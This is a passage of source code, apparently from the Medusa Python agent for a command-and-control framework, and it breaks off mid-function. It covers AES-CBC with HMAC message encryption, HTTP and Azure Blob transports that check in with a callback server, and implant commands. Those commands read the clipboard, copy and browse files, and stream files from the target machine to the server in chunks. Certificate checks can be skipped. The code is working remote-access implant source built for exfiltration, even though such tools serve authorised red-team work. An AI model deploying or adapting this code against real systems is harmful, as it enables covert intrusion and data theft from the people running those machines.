shift_rows(plain_state) add_round_key(plain_state, self._key_matrices[-1]) return matrix2bytes(plain_state) def decrypt_block(self, ciphertext): assert len(ciphertext) == 16 cipher_state = bytes2matrix(ciphertext) add_round_key(cipher_state, self._key_matrices[-1]) inv_shift_rows(cipher_state) inv_sub_bytes(cipher_state) for i in range(self.n_rounds - 1, 0, -1): add_round_key(cipher_state, self._key_matrices[i]) inv_mix_columns(cipher_state) inv_shift_rows(cipher_state) inv_sub_bytes(cipher_state) add_round_key(cipher_state, self._key_matrices[0]) return matrix2bytes(cipher_state) def encrypt_cbc(self, plaintext, iv): assert len(iv) == 16 plaintext = pad(plaintext) blocks = [] previous = iv for plaintext_block in split_blocks(plaintext): block = self.encrypt_block(xor_bytes(plaintext_block, previous)) blocks.extend(block) previous = block return bytes(b''.join(blocks)) def decrypt_cbc(self, ciphertext, iv): assert len(iv) == 16 blocks = [] previous = iv for ciphertext_block in split_blocks(ciphertext): blocks.extend(xor_bytes(previous, self.decrypt_block(ciphertext_block), True)) previous = ciphertext_block return unpad(''.join(blocks)) class medusa: def encrypt(self, data): from hmac import new import hashlib if self.agent_config["enc_key"]["value"] == "aes256_hmac" and len(data)>0: key = base64.b64decode(self.agent_config["enc_key"]["enc_key"]) iv = os.urandom(16) ciphertext = AES(key).encrypt_cbc(data, iv) hmac = new(key, iv + ciphertext, hashlib.sha256).digest() return iv + ciphertext + hmac else: return data def decrypt(self, data): from hmac import new, compare_digest import hashlib if self.agent_config["enc_key"]["value"] == "aes256_hmac": if len(data)>0: key = base64.b64decode(self.agent_config["enc_key"]["dec_key"]) uuid = data[:36] iv = data[36:52] ct = data[52:-32] received_hmac = data[-32:] hmac = new(key, iv + ct, hashlib.sha256).digest() if compare_digest(hmac, received_hmac): return (uuid + AES(key).decrypt_cbc(ct, iv)).decode() else: return "" else: return "" else: return data.decode() ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/manual_crypto.py3 ================================================ s_box = ( 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, ) inv_s_box = ( 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, 0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D, ) def sub_bytes(s): for i in range(4): for j in range(4): s[i][j] = s_box[s[i][j]] def inv_sub_bytes(s): for i in range(4): for j in range(4): s[i][j] = inv_s_box[s[i][j]] def shift_rows(s): s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1] s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2] s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3] def inv_shift_rows(s): s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1] s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2] s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3] def add_round_key(s, k): for i in range(4): for j in range(4): s[i][j] ^= k[i][j] xtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1) def mix_single_column(a): t = a[0] ^ a[1] ^ a[2] ^ a[3] u = a[0] a[0] ^= t ^ xtime(a[0] ^ a[1]) a[1] ^= t ^ xtime(a[1] ^ a[2]) a[2] ^= t ^ xtime(a[2] ^ a[3]) a[3] ^= t ^ xtime(a[3] ^ u) def mix_columns(s): for i in range(4): mix_single_column(s[i]) def inv_mix_columns(s): for i in range(4): u = xtime(xtime(s[i][0] ^ s[i][2])) v = xtime(xtime(s[i][1] ^ s[i][3])) s[i][0] ^= u s[i][1] ^= v s[i][2] ^= u s[i][3] ^= v mix_columns(s) r_con = ( 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, ) def bytes2matrix(text): return [list(text[i:i+4]) for i in range(0, len(text), 4)] def matrix2bytes(matrix): return bytes(sum(matrix, [])) def xor_bytes(a, b): return bytes(i^j for i, j in zip(a, b)) def inc_bytes(a): out = list(a) for i in reversed(range(len(out))): if out[i] == 0xFF: out[i] = 0 else: out[i] += 1 break return bytes(out) def pad(plaintext): padding_len = 16 - (len(plaintext) % 16) padding = bytes([padding_len] * padding_len) return plaintext + padding def unpad(plaintext): padding_len = plaintext[-1] assert padding_len > 0 message, padding = plaintext[:-padding_len], plaintext[-padding_len:] assert all(p == padding_len for p in padding) return message def split_blocks(message, block_size=16, require_padding=True): assert len(message) % block_size == 0 or not require_padding return [message[i:i+16] for i in range(0, len(message), block_size)] class AES: rounds_by_key_size = {16: 10, 24: 12, 32: 14} def __init__(self, master_key): assert len(master_key) in AES.rounds_by_key_size self.n_rounds = AES.rounds_by_key_size[len(master_key)] self._key_matrices = self._expand_key(master_key) def _expand_key(self, master_key): key_columns = bytes2matrix(master_key) iteration_size = len(master_key) // 4 columns_per_iteration = len(key_columns) i = 1 while len(key_columns) < (self.n_rounds + 1) * 4: word = list(key_columns[-1]) if len(key_columns) % iteration_size == 0: word.append(word.pop(0)) word = [s_box[b] for b in word] word[0] ^= r_con[i] i += 1 elif len(master_key) == 32 and len(key_columns) % iteration_size == 4: word = [s_box[b] for b in word] word = xor_bytes(word, key_columns[-iteration_size]) key_columns.append(word) return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)] def encrypt_block(self, plaintext): assert len(plaintext) == 16 plain_state = bytes2matrix(plaintext) add_round_key(plain_state, self._key_matrices[0]) for i in range(1, self.n_rounds): sub_bytes(plain_state) shift_rows(plain_state) mix_columns(plain_state) add_round_key(plain_state, self._key_matrices[i]) sub_bytes(plain_state) shift_rows(plain_state) add_round_key(plain_state, self._key_matrices[-1]) return matrix2bytes(plain_state) def decrypt_block(self, ciphertext): assert len(ciphertext) == 16 cipher_state = bytes2matrix(ciphertext) add_round_key(cipher_state, self._key_matrices[-1]) inv_shift_rows(cipher_state) inv_sub_bytes(cipher_state) for i in range(self.n_rounds - 1, 0, -1): add_round_key(cipher_state, self._key_matrices[i]) inv_mix_columns(cipher_state) inv_shift_rows(cipher_state) inv_sub_bytes(cipher_state) add_round_key(cipher_state, self._key_matrices[0]) return matrix2bytes(cipher_state) def encrypt_cbc(self, plaintext, iv): assert len(iv) == 16 plaintext = pad(plaintext) blocks = [] previous = iv for plaintext_block in split_blocks(plaintext): block = self.encrypt_block(xor_bytes(plaintext_block, previous)) blocks.append(block) previous = block return b''.join(blocks) def decrypt_cbc(self, ciphertext, iv): assert len(iv) == 16 blocks = [] previous = iv for ciphertext_block in split_blocks(ciphertext): blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block))) previous = ciphertext_block return unpad(b''.join(blocks)) class medusa: def encrypt(self, data): from hmac import new if self.agent_config["enc_key"]["value"] == "aes256_hmac" and len(data)>0: key = base64.b64decode(self.agent_config["enc_key"]["enc_key"]) iv = os.urandom(16) ciphertext = AES(key).encrypt_cbc(data, iv) hmac = new(key, iv + ciphertext, 'sha256').digest() return iv + ciphertext + hmac else: return data def decrypt(self, data): from hmac import new, compare_digest if self.agent_config["enc_key"]["value"] == "aes256_hmac": if len(data)>0: key = base64.b64decode(self.agent_config["enc_key"]["dec_key"]) uuid = data[:36] iv = data[36:52] ct = data[52:-32] received_hmac = data[-32:] hmac = new(key, iv + ct, 'sha256').digest() if compare_digest(hmac, received_hmac): return (uuid + AES(key).decrypt_cbc(ct, iv)).decode() else: return "" else: return "" else: return data.decode() ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py2 ================================================ ### IMPORTS ### import urllib2 import uuid ### CLASS_FIELDS ### blob_endpoint = "BLOB_ENDPOINT_PLACEHOLDER" container_name = "CONTAINER_NAME_PLACEHOLDER" sas_token = "CONTAINER_SAS_PLACEHOLDER" gcontext = None #CERTSKIP ### FUNCTIONS ### def get_blob_url(self, blob_path): return "{}/{}/{}?{}".format(self.blob_endpoint, self.container_name, blob_path, self.sas_token) def put_blob(self, blob_path, data): url = self.get_blob_url(blob_path) try: req = urllib2.Request(url, data=data) req.get_method = lambda: "PUT" req.add_header("x-ms-blob-type", "BlockBlob") req.add_header("Content-Type", "application/octet-stream") req.add_header("Content-Length", str(len(data))) try: resp = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: resp = urllib2.urlopen(req, timeout=30) try: return resp.getcode() in (200, 201) finally: try: resp.close() except Exception: pass except Exception: return False def delete_blob(self, blob_path): url = self.get_blob_url(blob_path) try: req = urllib2.Request(url) req.get_method = lambda: "DELETE" req.add_header("x-ms-blob-type", "BlockBlob") req.add_header("Content-Type", "application/octet-stream") try: resp = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: resp = urllib2.urlopen(req, timeout=30) try: return resp.getcode() in (200, 201, 202, 204) finally: try: resp.close() except Exception: pass except Exception: return False def get_blob(self, blob_path): url = self.get_blob_url(blob_path) try: req = urllib2.Request(url) try: resp = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: resp = urllib2.urlopen(req, timeout=30) try: return resp.read() finally: resp.close() except urllib2.HTTPError as e: if e.code == 404: return b"" return b"" except Exception: return b"" def postMessageAndRetrieveResponseBlob(self, data): formatted_data = self.formatMessage(data) message_id = uuid.uuid4() self.put_blob("ats/{}.blob".format(message_id), formatted_data) response = b"" while response == b"": self.agentSleep() response = self.get_blob("sta/{}.blob".format(message_id)) self.delete_blob("sta/{}.blob".format(message_id)) decoded_response = base64.b64decode(response) return self.formatResponse(self.decrypt(decoded_response)) def postMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def getMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def checkIn(self): hostname = socket.gethostname() ip = '' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, "domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" + self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib2.HTTPSHandler if tls else urllib2.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib2.HTTPBasicAuthHandler() opener = urllib2.build_opener(proxy, auth, handler) else: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = urllib2.build_opener(proxy, handler) urllib2.install_opener(opener) try: try: response = urllib2.urlopen(req, context=self.gcontext, timeout=30) except TypeError: response = urllib2.urlopen(req, timeout=30) out = base64.b64decode(response.read()) response.close() return out except: return "" ### CONFIG ### "Headers": HEADER_PLACEHOLDER, "Sleep": int("CALLBACK_INTERVAL_PLACEHOLDER"), "Jitter": int("CALLBACK_JITTER_PLACEHOLDER"), ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py3 ================================================ ### IMPORTS ### import urllib.request import uuid ### CLASS_FIELDS ### blob_endpoint = "BLOB_ENDPOINT_PLACEHOLDER" container_name = "CONTAINER_NAME_PLACEHOLDER" sas_token = "CONTAINER_SAS_PLACEHOLDER" gcontext = None #CERTSKIP ### FUNCTIONS ### def get_blob_url(self, blob_path: str) -> str: return f"{self.blob_endpoint}/{self.container_name}/{blob_path}?{self.sas_token}" def put_blob(self, blob_path: str, data: bytes) -> bool: url = self.get_blob_url(blob_path) try: req = urllib.request.Request( url, data=data, method="PUT", headers={ "x-ms-blob-type": "BlockBlob", "Content-Type": "application/octet-stream", "Content-Length": str(len(data)), } ) with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp: return resp.status in (200, 201) except Exception: return False def delete_blob(self, blob_path: str) -> bool: url = self.get_blob_url(blob_path) try: req = urllib.request.Request( url, method="DELETE", headers={ "x-ms-blob-type": "BlockBlob", "Content-Type": "application/octet-stream", } ) with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp: return resp.status in (200, 201, 202, 204) except Exception: return False def get_blob(self, blob_path: str) -> bytes: url = self.get_blob_url(blob_path) try: req = urllib.request.Request(url, method="GET") with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp: return resp.read() except urllib.request.HTTPError as e: if e.code == 404: return b"" return b"" except Exception: return b"" def postMessageAndRetrieveResponseBlob(self, data): formatted_data = self.formatMessage(data) message_id = uuid.uuid4() self.put_blob(f"ats/{message_id}.blob", formatted_data) response = b"" while response == b"": self.agentSleep() response = self.get_blob(f"sta/{message_id}.blob") self.delete_blob(f"sta/{message_id}.blob") decoded_response = base64.b64decode(response) return self.formatResponse(self.decrypt(decoded_response)) def postMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def getMessageAndRetrieveResponse(self, data): return self.postMessageAndRetrieveResponseBlob(data) def checkIn(self): hostname = socket.gethostname() ip = '' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, "domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" + self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib.request.HTTPSHandler if tls else urllib.request.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib.request.HTTPBasicAuthHandler() opener = urllib.request.build_opener(proxy, auth, handler) else: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = urllib.request.build_opener(proxy, handler) urllib.request.install_opener(opener) try: with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as response: out = base64.b64decode(response.read()) response.close() return out except: return "" ### CONFIG ### "Headers": HEADER_PLACEHOLDER, "Sleep": int("CALLBACK_INTERVAL_PLACEHOLDER"), "Jitter": int("CALLBACK_JITTER_PLACEHOLDER"), ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py2 ================================================ ### IMPORTS ### import urllib2 ### CLASS_FIELDS ### ### FUNCTIONS ### def postMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST'))) def getMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True)))) def checkIn(self): hostname = socket.gethostname() ip = '' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, "domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" + self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib2.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) #CERTSKIP if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib2.HTTPSHandler if tls else urllib2.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib2.HTTPBasicAuthHandler() opener = urllib2.build_opener(proxy, auth, handler) else: proxy = urllib2.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = urllib2.build_opener(proxy, handler) urllib2.install_opener(opener) try: response = urllib2.urlopen(req) out = base64.b64decode(response.read()) response.close() return out except: return "" ### CONFIG ### "Server": "callback_host", "Port": "callback_port", "PostURI": "/post_uri", "Headers": HEADER_PLACEHOLDER, "Sleep": callback_interval, "Jitter": callback_jitter, "GetURI": "/get_uri", "GetParam": "query_path_name", ================================================ FILE: Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py3 ================================================ ### IMPORTS ### import urllib.request ### CLASS_FIELDS ### ### FUNCTIONS ### def postMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST'))) def getMessageAndRetrieveResponse(self, data): return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True)))) def checkIn(self): hostname = socket.gethostname() ip = '' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, "domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" + self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) #CERTSKIP if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib.request.HTTPSHandler if tls else urllib.request.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib.request.HTTPBasicAuthHandler() opener = urllib.request.build_opener(proxy, auth, handler) else: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = urllib.request.build_opener(proxy, handler) urllib.request.install_opener(opener) try: with urllib.request.urlopen(req) as response: out = base64.b64decode(response.read()) response.close() return out except: return "" ### CONFIG ### "Server": "callback_host", "Port": "callback_port", "PostURI": "/post_uri", "Headers": HEADER_PLACEHOLDER, "Sleep": callback_interval, "Jitter": callback_jitter, "GetURI": "/get_uri", "GetParam": "query_path_name", ================================================ FILE: Payload_Type/medusa/medusa/agent_code/cat.py ================================================ def cat(self, task_id, path): file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) with open(file_path, 'r') as f: content = f.readlines() return ''.join(content) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/cd.py ================================================ def cd(self, task_id, path): if path == "..": self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep)) else: self.current_directory = path if path[0] == os.sep \ else os.path.abspath(os.path.join(self.current_directory,path)) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/clipboard.py2 ================================================ def clipboard(self, task_id): from Cocoa import NSPasteboard, NSStringPboardType pboard = NSPasteboard.generalPasteboard() pString = pboard.stringForType_(NSStringPboardType) return str(pString).encode('utf8') ================================================ FILE: Payload_Type/medusa/medusa/agent_code/cp.py ================================================ def cp(self, task_id, source, destination): import shutil source_path = source if source[0] == os.sep \ else os.path.join(self.current_directory,source) dest_path = destination if destination[0] == os.sep \ else os.path.join(self.current_directory,destination) if os.path.isdir(source_path): shutil.copytree(source_path, dest_path) else: shutil.copy(source_path, dest_path) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/cwd.py ================================================ def cwd(self, task_id): return self.current_directory ================================================ FILE: Payload_Type/medusa/medusa/agent_code/download.py ================================================ def download(self, task_id, file): file_path = file if file[0] == os.sep \ else os.path.join(self.current_directory,file) file_size = os.stat(file_path).st_size total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0) data = { "action": "post_response", "responses": [{ "task_id": task_id, "download": { "total_chunks": total_chunks, "full_path": file_path, "chunk_size": CHUNK_SIZE } }] } initial_response = self.postMessageAndRetrieveResponse(data) file_id = initial_response["responses"][0]["file_id"] chunk_num = 1 with open(file_path, 'rb') as f: while True: if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." content = f.read(CHUNK_SIZE) if not content: break # done data = { "action": "post_response", "responses": [ { "task_id": task_id, "download": { "chunk_num": chunk_num, "file_id": file_id, "chunk_data": base64.b64encode(content).decode() } } ] } chunk_num+=1 response = self.postMessageAndRetrieveResponse(data) return json.dumps({ "agent_file_id": file_id }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/download_bulk.py ================================================ def download_bulk(self, task_id, path, mode="archive"): """ Bulk download files or a directory from the target machine. Args: task_id: The task identifier for this operation. path: A file path, directory path, or JSON list of file paths (absolute paths). mode: "iterative" to send files one by one, or "archive" to bundle into an in-memory zip and send as a single file (default: "archive"). """ import zipfile import io # Resolve the list of files to download. # archive_base_dir is used in archive mode to compute relative arcnames 